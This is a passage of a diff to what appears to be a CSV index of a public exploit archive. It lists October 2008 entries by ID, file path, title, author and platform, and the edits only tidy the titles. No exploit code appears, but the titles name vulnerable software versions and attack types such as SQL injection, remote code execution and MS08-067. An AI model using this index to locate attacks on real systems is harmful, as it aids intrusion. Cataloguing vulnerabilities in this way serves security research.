6713,platforms/php/webapps/6713.txt,"ScriptsEz Mini Hosting Panel (members.php) LFI",2008-10-09,JosS,php,webapps,0 6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 - (SQL) User Credentials Disclosure Exploit",2008-10-09,gnix,php,webapps,0 @@ -6290,53 +6290,53 @@ id,file,description,date,author,platform,type,port 6719,platforms/windows/dos/6719.py,"NoticeWare E-mail Server 5.1.2.2 - (POP3) Pre-Auth DoS Exploit",2008-10-10,rAWjAW,windows,dos,0 6720,platforms/asp/webapps/6720.txt,"Ayco Okul Portali (linkid) SQL Injection (tr)",2008-10-10,Crackers_Child,asp,webapps,0 6721,platforms/php/webapps/6721.txt,"Easynet4u Forum Host (forum.php) SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0 -6722,platforms/php/webapps/6722.txt,"Easynet4u faq Host (faq.php faq) Remote SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0 +6722,platforms/php/webapps/6722.txt,"Easynet4u faq Host (faq.php faq) SQL Injection",2008-10-10,SuB-ZeRo,php,webapps,0 6723,platforms/php/webapps/6723.txt,"Joomla Component Ignite Gallery 0.8.3 - SQL Injection",2008-10-10,H!tm@N,php,webapps,0 6724,platforms/php/webapps/6724.txt,"Joomla Component mad4joomla SQL Injection",2008-10-10,H!tm@N,php,webapps,0 6725,platforms/asp/webapps/6725.txt,"MunzurSoft Wep Portal W3 - (kat) SQL Injection",2008-10-10,LUPUS,asp,webapps,0 6726,platforms/hardware/dos/6726.txt,"Nokia Mini Map Browser (array sort) Silent Crash",2008-10-10,ikki,hardware,dos,0 6728,platforms/php/webapps/6728.txt,"Easynet4u Link Host (cat_id) SQL Injection",2008-10-10,BeyazKurt,php,webapps,0 -6729,platforms/php/webapps/6729.php,"SlimCMS <= 1.0.0 - (redirect.php) Privilege Escalation Exploit",2008-10-10,StAkeR,php,webapps,0 +6729,platforms/php/webapps/6729.php,"SlimCMS 1.0.0 - (redirect.php) Privilege Escalation Exploit",2008-10-10,StAkeR,php,webapps,0 6730,platforms/php/webapps/6730.txt,"Joomla Component ownbiblio 1.5.3 - (catid) SQL Injection",2008-10-11,H!tm@N,php,webapps,0 6731,platforms/asp/webapps/6731.txt,"Absolute Poll Manager XE 4.1 - (xlacomments.asp) SQL Injection",2008-10-11,Hakxer,asp,webapps,0 6732,platforms/windows/dos/6732.txt,"Microsoft Windows - InternalOpenColorProfile Heap Overflow PoC (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0 6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 - (LFD/CE) Multiple Vulnerabilities",2008-10-12,muuratsalo,php,webapps,0 6734,platforms/php/webapps/6734.txt,"mini-pub 0.3 - Local Directory Traversal / File Disclosure Vulnerabilities",2008-10-12,GoLd_M,php,webapps,0 -6735,platforms/php/webapps/6735.php,"Globsy <= 1.0 - Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0 +6735,platforms/php/webapps/6735.php,"Globsy 1.0 - Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0 6736,platforms/php/webapps/6736.txt,"Real Estate Scripts 2008 - (index.php cat) SQL Injection",2008-10-12,Hakxer,php,webapps,0 -6737,platforms/php/webapps/6737.txt,"LokiCMS <= 0.3.4 - (index.php page) Arbitrary Check File Exploit",2008-10-12,JosS,php,webapps,0 +6737,platforms/php/webapps/6737.txt,"LokiCMS 0.3.4 - (index.php page) Arbitrary Check File Exploit",2008-10-12,JosS,php,webapps,0 6738,platforms/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption PoC/DoS Exploit",2008-10-12,dmnt,windows,dos,0 -6739,platforms/php/webapps/6739.txt,"NewLife Blogger <= 3.0 - Insecure Cookie Handling / SQL Injection",2008-10-12,Pepelux,php,webapps,0 +6739,platforms/php/webapps/6739.txt,"NewLife Blogger 3.0 - Insecure Cookie Handling / SQL Injection",2008-10-12,Pepelux,php,webapps,0 6740,platforms/php/webapps/6740.txt,"My PHP Indexer 1.0 - (index.php) Local File Download",2008-10-12,JosS,php,webapps,0 6741,platforms/windows/dos/6741.py,"XM Easy Personal FTP Server 5.6.0 - Remote Denial of Service Exploit",2008-10-13,shinnai,windows,dos,0 6742,platforms/windows/dos/6742.py,"RaidenFTPD 2.4 build 3620 - Remote Denial of Service Exploit",2008-10-13,dmnt,windows,dos,0 6743,platforms/php/webapps/6743.pl,"LokiCMS 0.3.4 writeconfig() Remote Command Execution Exploit",2008-10-13,girex,php,webapps,0 6744,platforms/php/webapps/6744.txt,"LokiCMS 0.3.4 - (admin.php) Create Local File Inclusion Exploit",2008-10-13,JosS,php,webapps,0 -6745,platforms/php/webapps/6745.txt,"ParsBlogger (links.asp id) Remote SQL Injection",2008-10-13,"Hussin X",php,webapps,0 +6745,platforms/php/webapps/6745.txt,"ParsBlogger (links.asp id) SQL Injection",2008-10-13,"Hussin X",php,webapps,0 6746,platforms/php/webapps/6746.txt,"IndexScript 3.0 - (sug_cat.php parent_id) SQL Injection",2008-10-13,d3v1l,php,webapps,0 -6747,platforms/php/webapps/6747.php,"WP Comment Remix 1.4.3 - Remote SQL Injection Exploit",2008-10-14,g30rg3_x,php,webapps,0 -6748,platforms/php/webapps/6748.txt,"XOOPS Module xhresim - (index.php no) Remote SQL Injection",2008-10-14,EcHoLL,php,webapps,0 -6749,platforms/php/webapps/6749.php,"Nuked-klaN <= 1.7.7 / <= SP4.4 - Multiple Vulnerabilities",2008-10-14,"Charles Fol",php,webapps,0 +6747,platforms/php/webapps/6747.php,"WP Comment Remix 1.4.3 - SQL Injection Exploit",2008-10-14,g30rg3_x,php,webapps,0 +6748,platforms/php/webapps/6748.txt,"XOOPS Module xhresim - (index.php no) SQL Injection",2008-10-14,EcHoLL,php,webapps,0 +6749,platforms/php/webapps/6749.php,"Nuked-klaN 1.7.7 / <= SP4.4 - Multiple Vulnerabilities",2008-10-14,"Charles Fol",php,webapps,0 6750,platforms/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",hardware,remote,0 6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - (IP) Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0 6752,platforms/windows/dos/6752.pl,"Eserv 3.x FTP Server (ABOR) Remote Stack Overflow PoC",2008-10-14,LiquidWorm,windows,dos,0 6753,platforms/windows/dos/6753.py,"Titan FTP server 6.26 build 630 - Remote Denial of Service Exploit",2008-10-14,dmnt,windows,dos,0 6754,platforms/php/webapps/6754.txt,"My PHP Dating (success_story.php id) SQL Injection",2008-10-14,Hakxer,php,webapps,0 -6755,platforms/php/webapps/6755.php,"PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit",2008-10-14,EgiX,php,webapps,0 +6755,platforms/php/webapps/6755.php,"PhpWebGallery 1.7.2 Session Hijacking / Code Execution Exploit",2008-10-14,EgiX,php,webapps,0 6756,platforms/windows/dos/6756.txt,"VLC 0.9.2 Media Player XSPF Memory Corruption",2008-10-14,"Core Security",windows,dos,0 6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - afd.sys Privilege Escalation Exploit (K-plugin)",2008-10-15,"Ruben Santamarta ",windows,local,0 -6758,platforms/php/webapps/6758.txt,"AstroSPACES (id) Remote SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0 +6758,platforms/php/webapps/6758.txt,"AstroSPACES (id) SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0 6759,platforms/php/webapps/6759.txt,"mystats - (hits.php) Multiple Vulnerabilities",2008-10-15,JosS,php,webapps,0 -6760,platforms/php/webapps/6760.txt,"myEvent 1.6 - (viewevent.php) Remote SQL Injection",2008-10-15,JosS,php,webapps,0 -6761,platforms/windows/dos/6761.html,"Hummingbird <= 13.0 - ActiveX Remote Buffer Overflow PoC",2008-10-16,"Thomas Pollet",windows,dos,0 -6762,platforms/php/webapps/6762.txt,"CafeEngine Multiple Remote SQL Injection Vulnerabilities",2008-10-16,0xFFFFFF,php,webapps,0 +6760,platforms/php/webapps/6760.txt,"myEvent 1.6 - (viewevent.php) SQL Injection",2008-10-15,JosS,php,webapps,0 +6761,platforms/windows/dos/6761.html,"Hummingbird 13.0 - ActiveX Remote Buffer Overflow PoC",2008-10-16,"Thomas Pollet",windows,dos,0 +6762,platforms/php/webapps/6762.txt,"CafeEngine Multiple SQL Injection Vulnerabilities",2008-10-16,0xFFFFFF,php,webapps,0 6763,platforms/php/webapps/6763.txt,"Mosaic Commerce (category.php cid) SQL Injection",2008-10-16,"Ali Abbasi",php,webapps,0 6764,platforms/php/webapps/6764.php,"Mic_blog 0.0.3 - (SQL Injection/Privilege Escalation) Remote Exploit",2008-10-16,StAkeR,php,webapps,0 -6765,platforms/php/webapps/6765.txt,"IP Reg <= 0.4 - Multiple Remote SQL Injection Vulnerabilities",2008-10-16,JosS,php,webapps,0 +6765,platforms/php/webapps/6765.txt,"IP Reg 0.4 - Multiple SQL Injection Vulnerabilities",2008-10-16,JosS,php,webapps,0 6766,platforms/php/webapps/6766.txt,"PokerMax Poker League Insecure Cookie Handling",2008-10-16,DaRkLiFe,php,webapps,0 6767,platforms/php/webapps/6767.txt,"Kure 0.6.3 - (index.php post & doc) Local File Inclusion",2008-10-16,JosS,php,webapps,0 -6768,platforms/php/webapps/6768.txt,"Mantis Bug Tracker <= 1.1.3 - Remote Code Execution Exploit",2008-10-16,EgiX,php,webapps,0 -6769,platforms/php/webapps/6769.pl,"iGaming CMS 2.0 Alpha 1 - (search.php) Remote SQL Injection Exploit",2008-10-16,StAkeR,php,webapps,0 +6768,platforms/php/webapps/6768.txt,"Mantis Bug Tracker 1.1.3 - Remote Code Execution Exploit",2008-10-16,EgiX,php,webapps,0 +6769,platforms/php/webapps/6769.pl,"iGaming CMS 2.0 Alpha 1 - (search.php) SQL Injection Exploit",2008-10-16,StAkeR,php,webapps,0 6770,platforms/php/webapps/6770.txt,"PHP Easy Downloader 1.5 - (file) File Disclosure",2008-10-16,LMaster,php,webapps,0 6771,platforms/cgi/webapps/6771.txt,"Calendars for the Web 4.02 Admin Auth Bypass",2008-10-16,SecVuln,cgi,webapps,0 6772,platforms/php/webapps/6772.txt,"Post Affiliate Pro 2.0 - (index.php md) Local File Inclusion",2008-10-16,ZeN,php,webapps,0 @@ -6345,38 +6345,38 @@ id,file,description,date,author,platform,type,port 6775,platforms/solaris/dos/6775.c,"Solaris 9 PortBind XDR-DECODE taddr2uaddr() Remote DoS Exploit",2008-10-17,"Federico L. Bossi Bonin",solaris,dos,0 6776,platforms/windows/remote/6776.html,"Hummingbird Deployment Wizard 2008 - ActiveX File Execution(2)",2008-10-17,shinnai,windows,remote,0 6777,platforms/php/webapps/6777.txt,"WordPress Plugin st_newsletter - (stnl_iframe.php) SQL Injection",2008-10-17,r45c4l,php,webapps,0 -6778,platforms/php/webapps/6778.pl,"XOOPS Module GesGaleri (kategorino) Remote SQL Injection Exploit",2008-10-18,EcHoLL,php,webapps,0 +6778,platforms/php/webapps/6778.pl,"XOOPS Module GesGaleri (kategorino) SQL Injection Exploit",2008-10-18,EcHoLL,php,webapps,0 6779,platforms/php/webapps/6779.txt,"phpFastNews 1.0.0 Insecure Cookie Handling",2008-10-18,Qabandi,php,webapps,0 -6780,platforms/php/webapps/6780.txt,"zeeproperty (adid) Remote SQL Injection",2008-10-18,"Hussin X",php,webapps,0 +6780,platforms/php/webapps/6780.txt,"zeeproperty (adid) SQL Injection",2008-10-18,"Hussin X",php,webapps,0 6781,platforms/php/webapps/6781.pl,"Meeting Room Booking System (MRBS) < 1.4 - SQL Injection Exploit",2008-10-18,Xianur0,php,webapps,0 6782,platforms/php/webapps/6782.php,"miniBloggie 1.0 - (del.php) Remote Blind SQL Injection Exploit",2008-10-18,StAkeR,php,webapps,0 -6783,platforms/php/webapps/6783.php,"Nuke ET <= 3.4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-10-18,EgiX,php,webapps,0 -6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader <= 1.5 - Remote File Creation Exploit",2008-10-18,StAkeR,php,webapps,0 +6783,platforms/php/webapps/6783.php,"Nuke ET 3.4 - (fckeditor) Remote Arbitrary File Upload Exploit",2008-10-18,EgiX,php,webapps,0 +6784,platforms/php/webapps/6784.pl,"PHP Easy Downloader 1.5 - Remote File Creation Exploit",2008-10-18,StAkeR,php,webapps,0 6785,platforms/php/webapps/6785.txt,"Fast Click SQL 1.1.7 Lite (init.php) Remote File Inclusion",2008-10-19,NoGe,php,webapps,0 6786,platforms/solaris/remote/6786.pl,"Solaris 9 - [UltraSPARC] sadmind Remote Root Exploit",2008-10-19,kingcope,solaris,remote,111 6787,platforms/windows/local/6787.pl,"BitTorrent 6.0.3 - (.torrent) Stack Buffer Overflow Exploit",2008-10-19,"Guido Landi",windows,local,0 -6788,platforms/php/webapps/6788.txt,"yappa-ng <= 2.3.3-beta0 - (album) Local File Inclusion",2008-10-19,Vrs-hCk,php,webapps,0 -6789,platforms/php/webapps/6789.pl,"Vivvo CMS <= 3.4 - Multiple Vulnerabilities",2008-10-19,Xianur0,php,webapps,0 +6788,platforms/php/webapps/6788.txt,"yappa-ng 2.3.3-beta0 - (album) Local File Inclusion",2008-10-19,Vrs-hCk,php,webapps,0 +6789,platforms/php/webapps/6789.pl,"Vivvo CMS 3.4 - Multiple Vulnerabilities",2008-10-19,Xianur0,php,webapps,0 6790,platforms/php/webapps/6790.py,"WBB Plugin rGallery 1.09 - (itemID) Blind SQL Injection Exploit",2008-10-20,Five-Three-Nine,php,webapps,0 6791,platforms/php/webapps/6791.pl,"e107 <= 0.7.13 - (usersettings.php) Blind SQL Injection Exploit",2008-10-19,girex,php,webapps,0 6792,platforms/php/webapps/6792.txt,"Joomla Component ds-syndicate (feed_id) SQL Injection",2008-10-20,boom3rang,php,webapps,0 6793,platforms/windows/remote/6793.html,"Dart Communications PowerTCP FTP module Remote BoF Exploit",2008-10-20,InTeL,windows,remote,0 -6795,platforms/php/webapps/6795.txt,"XOOPS Module makale Remote SQL Injection",2008-10-20,EcHoLL,php,webapps,0 +6795,platforms/php/webapps/6795.txt,"XOOPS Module makale SQL Injection",2008-10-20,EcHoLL,php,webapps,0 6796,platforms/php/webapps/6796.txt,"Limbo CMS - (Private Messaging Component) SQL Injection",2008-10-21,StAkeR,php,webapps,0 6797,platforms/php/webapps/6797.txt,"LightBlog 9.8 - (GET & POST & COOKIE) Multiple LFI Vulnerabilities",2008-10-21,JosS,php,webapps,0 6798,platforms/windows/local/6798.pl,"VLC Media Player TY File Stack Based Buffer Overflow Exploit",2008-10-21,"Guido Landi",windows,local,0 -6799,platforms/php/webapps/6799.txt,"ShopMaker 1.0 - (product.php id) Remote SQL Injection",2008-10-21,"Hussin X",php,webapps,0 +6799,platforms/php/webapps/6799.txt,"ShopMaker 1.0 - (product.php id) SQL Injection",2008-10-21,"Hussin X",php,webapps,0 6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - sftp rename Remote Buffer Overflow PoC (Auth)",2008-10-22,"Jeremy Brown",windows,dos,0 -6801,platforms/windows/remote/6801.txt,"Opera <= 9.60 Stored Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote,0 +6801,platforms/windows/remote/6801.txt,"Opera 9.60 Stored Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote,0 6802,platforms/php/webapps/6802.txt,"Joomla Component Daily Message 1.0.3 - (id) SQL Injection",2008-10-22,H!tm@N,php,webapps,0 6803,platforms/php/webapps/6803.txt,"Iamma Simple Gallery 1.0/2.0 - Arbitrary File Upload",2008-10-22,x0r,php,webapps,0 6804,platforms/windows/remote/6804.pl,"GoodTech SSH (SSH_FXP_OPEN) Remote Buffer Overflow Exploit",2008-10-22,r0ut3r,windows,remote,22 6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 DNS TXT Record Parsing Bug Heap Overflow PoC",2008-10-22,"Dan Kaminsky",multiple,dos,0 -6806,platforms/php/webapps/6806.txt,"phpcrs <= 2.06 - (importFunction) Local File Inclusion",2008-10-22,Pepelux,php,webapps,0 -6808,platforms/php/webapps/6808.pl,"LoudBlog <= 0.8.0a - (ajax.php) SQL Injection (Auth)",2008-10-22,Xianur0,php,webapps,0 +6806,platforms/php/webapps/6806.txt,"phpcrs 2.06 - (importFunction) Local File Inclusion",2008-10-22,Pepelux,php,webapps,0 +6808,platforms/php/webapps/6808.pl,"LoudBlog 0.8.0a - (ajax.php) SQL Injection (Auth)",2008-10-22,Xianur0,php,webapps,0 6809,platforms/php/webapps/6809.txt,"Joomla Component ionFiles 4.4.2 File Disclosure",2008-10-22,Vrs-hCk,php,webapps,0 -6810,platforms/asp/webapps/6810.txt,"DorsaCMS (ShowPage.aspx) Remote SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0 -6811,platforms/php/webapps/6811.txt,"YDC (kdlist.php cat) Remote SQL Injection",2008-10-22,"Hussin X",php,webapps,0 +6810,platforms/asp/webapps/6810.txt,"DorsaCMS (ShowPage.aspx) SQL Injection",2008-10-22,syst3m_f4ult,asp,webapps,0 +6811,platforms/php/webapps/6811.txt,"YDC (kdlist.php cat) SQL Injection",2008-10-22,"Hussin X",php,webapps,0 6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - sftp realpath Remote Buffer Overflow PoC (Auth)",2008-10-22,"Jeremy Brown",windows,dos,0 6813,platforms/windows/remote/6813.html,"Opera 9.52/9.60 - Stored Cross-Site Scripting Code Execution PoC",2008-10-23,"Aviv Raff",windows,remote,0 6814,platforms/php/webapps/6814.php,"CSPartner 1.0 - (Delete All Users/SQL Injection) Remote Exploit",2008-10-23,StAkeR,php,webapps,0 @@ -6386,13 +6386,13 @@ id,file,description,date,author,platform,type,port 6818,platforms/php/webapps/6818.txt,"aflog 1.01 - Multiple Insecure Cookie Handling Vulnerabilies",2008-10-23,JosS,php,webapps,0 6819,platforms/php/webapps/6819.txt,"MindDezign Photo Gallery 2.2 - (index.php id) SQL Injection",2008-10-23,"CWH Underground",php,webapps,0 6820,platforms/php/webapps/6820.pl,"MindDezign Photo Gallery 2.2 - Arbitrary Add Admin Exploit",2008-10-23,"CWH Underground",php,webapps,0 -6821,platforms/php/webapps/6821.txt,"miniPortail <= 2.2 - (XSS/LFI) Remote Vulnerabilities",2008-10-23,StAkeR,php,webapps,0 -6822,platforms/php/webapps/6822.txt,"websvn <= 2.0 - (XSS/fh/CE) Multiple Vulnerabilities",2008-10-23,"GulfTech Security",php,webapps,0 +6821,platforms/php/webapps/6821.txt,"miniPortail 2.2 - (XSS/LFI) Remote Vulnerabilities",2008-10-23,StAkeR,php,webapps,0 +6822,platforms/php/webapps/6822.txt,"websvn 2.0 - (XSS/fh/CE) Multiple Vulnerabilities",2008-10-23,"GulfTech Security",php,webapps,0 6823,platforms/php/webapps/6823.txt,"siteengine 5.x - Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0 6824,platforms/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution PoC (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0 6825,platforms/windows/local/6825.pl,"VLC 0.9.4 - (.ty) Buffer Overflow Exploit (SEH)",2008-10-23,"Guido Landi",windows,local,0 6826,platforms/php/webapps/6826.txt,"joomla component archaic binary gallery 0.2 - Directory Traversal",2008-10-24,H!tm@N,php,webapps,0 -6827,platforms/php/webapps/6827.txt,"Joomla Component Kbase 1.0 - Remote SQL Injection",2008-10-24,H!tm@N,php,webapps,0 +6827,platforms/php/webapps/6827.txt,"Joomla Component Kbase 1.0 - SQL Injection",2008-10-24,H!tm@N,php,webapps,0 6828,platforms/windows/remote/6828.html,"db Software Laboratory VImpX - (VImpX.ocx) Multiple Vulnerabilities",2008-10-24,shinnai,windows,remote,0 6829,platforms/php/webapps/6829.txt,"Aj RSS Reader (EditUrl.php url) SQL Injection",2008-10-24,yassine_enp,php,webapps,0 6830,platforms/php/webapps/6830.txt,"NEPT Image Uploader 1.0 - Arbitrary Shell Upload",2008-10-24,Dentrasi,php,webapps,0 @@ -6409,32 +6409,32 @@ id,file,description,date,author,platform,type,port 6841,platforms/windows/remote/6841.txt,"Microsoft Windows Server - Code Execution Exploit (MS08-067) (Universal)",2008-10-26,EMM,windows,remote,135 6842,platforms/php/webapps/6842.txt,"WordPress Media Holder - (mediaHolder.php id) SQL Injection",2008-10-26,boom3rang,php,webapps,0 6843,platforms/php/webapps/6843.txt,"SFS Ez Forum (forum.php id) SQL Injection",2008-10-26,Hurley,php,webapps,0 -6844,platforms/php/webapps/6844.pl,"MyForum 1.3 - (lecture.php id) Remote SQL Injection Exploit",2008-10-26,Vrs-hCk,php,webapps,0 +6844,platforms/php/webapps/6844.pl,"MyForum 1.3 - (lecture.php id) SQL Injection Exploit",2008-10-26,Vrs-hCk,php,webapps,0 6845,platforms/cgi/webapps/6845.txt,"Ads Pro (dhtml.pl page) Remote Command Execution Exploit",2008-10-26,S0l1D,cgi,webapps,0 6846,platforms/php/webapps/6846.txt,"MyForum 1.3 - (padmin) Local File Inclusion",2008-10-27,Vrs-hCk,php,webapps,0 -6847,platforms/php/webapps/6847.txt,"Persia BME E-Catalogue Remote SQL Injection",2008-10-27,BugReport.IR,php,webapps,0 +6847,platforms/php/webapps/6847.txt,"Persia BME E-Catalogue SQL Injection",2008-10-27,BugReport.IR,php,webapps,0 6848,platforms/php/webapps/6848.txt,"TlAds 1.0 - Remote Insecure Cookie Handling",2008-10-27,x0r,php,webapps,0 6849,platforms/php/webapps/6849.txt,"e107 Plugin alternate_profiles (id) SQL Injection",2008-10-27,boom3rang,php,webapps,0 6850,platforms/php/webapps/6850.txt,"MyKtools 2.4 - (langage) Local File Inclusion",2008-10-27,x0r,php,webapps,0 6851,platforms/linux/local/6851.c,"Linux Kernel < 2.6.22 - ftruncate()/open() Local Root Exploit",2008-10-27,gat3way,linux,local,0 6852,platforms/php/webapps/6852.pl,"e107 Plugin EasyShop (category_id) Blind SQL Injection Exploit",2008-10-27,StAkeR,php,webapps,0 6853,platforms/php/webapps/6853.txt,"questcms - (XSS/Directory Traversal/SQL) Multiple Vulnerabilities",2008-10-27,d3b4g,php,webapps,0 -6854,platforms/php/webapps/6854.txt,"Aiocp 1.4 - (poll_id) Remote SQL Injection",2008-10-27,ExSploiters,php,webapps,0 +6854,platforms/php/webapps/6854.txt,"Aiocp 1.4 - (poll_id) SQL Injection",2008-10-27,ExSploiters,php,webapps,0 6855,platforms/php/webapps/6855.txt,"MyKtools 2.4 - Arbitrary Database Backup",2008-10-27,Stack,php,webapps,0 -6856,platforms/php/webapps/6856.txt,"e107 Plugin BLOG Engine 2.1.4 - Remote SQL Injection",2008-10-28,ZoRLu,php,webapps,0 +6856,platforms/php/webapps/6856.txt,"e107 Plugin BLOG Engine 2.1.4 - SQL Injection",2008-10-28,ZoRLu,php,webapps,0 6857,platforms/php/webapps/6857.txt,"MyForum 1.3 Insecure Cookie Handling",2008-10-28,Stack,php,webapps,0 -6858,platforms/php/webapps/6858.txt,"PersianBB (iranian_music.php id) Remote SQL Injection",2008-10-28,"Hussin X",php,webapps,0 -6859,platforms/php/webapps/6859.txt,"Agares ThemeSiteScript 1.0 (loadadminpage) - RFI",2008-10-28,DaRkLiFe,php,webapps,0 +6858,platforms/php/webapps/6858.txt,"PersianBB (iranian_music.php id) SQL Injection",2008-10-28,"Hussin X",php,webapps,0 +6859,platforms/php/webapps/6859.txt,"Agares ThemeSiteScript 1.0 (loadadminpage) - Remote File Inclusion",2008-10-28,DaRkLiFe,php,webapps,0 6860,platforms/php/webapps/6860.txt,"TlGuestBook 1.2 Insecure Cookie Handling",2008-10-28,x0r,php,webapps,0 -6861,platforms/php/webapps/6861.pl,"H2O-CMS <= 3.4 - Remote Command Execution Exploit (mq = off)",2008-10-28,StAkeR,php,webapps,0 -6862,platforms/php/webapps/6862.txt,"H2O-CMS <= 3.4 Insecure Cookie Handling",2008-10-29,Stack,php,webapps,0 +6861,platforms/php/webapps/6861.pl,"H2O-CMS 3.4 - Remote Command Execution Exploit (mq = off)",2008-10-28,StAkeR,php,webapps,0 +6862,platforms/php/webapps/6862.txt,"H2O-CMS 3.4 Insecure Cookie Handling",2008-10-29,Stack,php,webapps,0 6863,platforms/windows/dos/6863.pl,"PacketTrap TFTPD 2.2.5459.0 - Remote Denial of Service Exploit",2008-10-29,"Jeremy Brown",windows,dos,0 6864,platforms/cgi/webapps/6864.txt,"Sepal SPBOARD 4.5 - (board.cgi) Remote Command Exec",2008-10-29,GoLd_M,cgi,webapps,0 6865,platforms/php/webapps/6865.txt,"e107 plugin fm pro 1 - (fd/upload/dt) Multiple Vulnerabilities",2008-10-29,GoLd_M,php,webapps,0 -6866,platforms/php/webapps/6866.pl,"7Shop <= 1.1 - Remote Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 -6867,platforms/php/webapps/6867.pl,"WordPress Plugin e-Commerce <= 3.4 - Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 -6868,platforms/php/webapps/6868.pl,"Mambo Component SimpleBoard <= 1.0.1 - Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 -6869,platforms/php/webapps/6869.txt,"WebCards <= 1.3 - Remote SQL Injection",2008-10-29,t0pP8uZz,php,webapps,0 +6866,platforms/php/webapps/6866.pl,"7Shop 1.1 - Remote Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 +6867,platforms/php/webapps/6867.pl,"WordPress Plugin e-Commerce 3.4 - Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 +6868,platforms/php/webapps/6868.pl,"Mambo Component SimpleBoard 1.0.1 - Arbitrary File Upload Exploit",2008-10-29,t0pP8uZz,php,webapps,0 +6869,platforms/php/webapps/6869.txt,"WebCards 1.3 - SQL Injection",2008-10-29,t0pP8uZz,php,webapps,0 6870,platforms/windows/remote/6870.html,"MW6 Aztec ActiveX (Aztec.dll) Remote Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 6871,platforms/windows/remote/6871.html,"MW6 Barcode ActiveX (Barcode.dll) Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 6872,platforms/windows/remote/6872.html,"MW6 DataMatrix - ActiveX (DataMatrix.dll) Insecure Method Exploit",2008-10-29,DeltahackingTEAM,windows,remote,0 @@ -6442,9 +6442,9 @@ id,file,description,date,author,platform,type,port 6874,platforms/php/webapps/6874.txt,"Harlandscripts Pro Traffic One (mypage.php) SQL Injection",2008-10-29,"Beenu Arora",php,webapps,0 6875,platforms/windows/remote/6875.html,"Visagesoft eXPert PDF ViewerX - (VSPDFViewerX.ocx) File Overwrite",2008-10-29,"Marco Torti",windows,remote,0 6876,platforms/php/webapps/6876.txt,"Venalsur on-line Booking Centre (OfertaID) XSS/SQL Injection Vulnerabilities",2008-10-29,d3b4g,php,webapps,0 -6877,platforms/php/webapps/6877.txt,"Pro Traffic One (poll_results.php id) Remote SQL Injection",2008-10-29,"Hussin X",php,webapps,0 +6877,platforms/php/webapps/6877.txt,"Pro Traffic One (poll_results.php id) SQL Injection",2008-10-29,"Hussin X",php,webapps,0 6878,platforms/windows/remote/6878.html,"DjVu ActiveX Control 3.0 ImageURL Property Overflow Exploit",2008-10-30,"Shahriyar Jalayeri",windows,remote,0 -6879,platforms/php/webapps/6879.txt,"MyPHP Forum <= 3.0 Edit Topics/Blind SQL Injection Vulnerabilities",2008-10-30,StAkeR,php,webapps,0 +6879,platforms/php/webapps/6879.txt,"MyPHP Forum 3.0 Edit Topics/Blind SQL Injection Vulnerabilities",2008-10-30,StAkeR,php,webapps,0 6880,platforms/windows/remote/6880.html,"Opera 9.61 opera:historysearch Code Execution Exploit PoC",2008-10-30,"Aviv Raff",windows,remote,0 6881,platforms/php/webapps/6881.txt,"Absolute File Send 1.0 - Remote Cookie Handling",2008-10-30,Hakxer,php,webapps,0 6882,platforms/php/webapps/6882.txt,"Absolute Podcast 1.0 - Remote Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps,0 @@ -6467,41 +6467,41 @@ id,file,description,date,author,platform,type,port 6900,platforms/php/webapps/6900.txt,"Absolute News Manager 5.1 Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6901,platforms/php/webapps/6901.txt,"Absolute News Feed 1.0 - Remote Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6902,platforms/php/webapps/6902.txt,"Absolute FAQ Manager 6.0 Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 -6903,platforms/php/webapps/6903.txt,"SFS EZ Hotscripts-like Site (cid) Remote SQL Injection",2008-10-31,TR-ShaRk,php,webapps,0 +6903,platforms/php/webapps/6903.txt,"SFS EZ Hotscripts-like Site (cid) SQL Injection",2008-10-31,TR-ShaRk,php,webapps,0 6904,platforms/php/webapps/6904.txt,"Absolute Newsletter 6.1 Insecure Cookie Handling",2008-10-31,x0r,php,webapps,0 -6905,platforms/php/webapps/6905.txt,"SFS EZ Hosting Directory (cat_id) Remote SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 -6906,platforms/php/webapps/6906.txt,"SFS EZ Gaming Directory (cat_id) Remote SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 +6905,platforms/php/webapps/6905.txt,"SFS EZ Hosting Directory (cat_id) SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 +6906,platforms/php/webapps/6906.txt,"SFS EZ Gaming Directory (cat_id) SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 6907,platforms/php/webapps/6907.txt,"SFS EZ Home Business Directory (cat_id) SQL 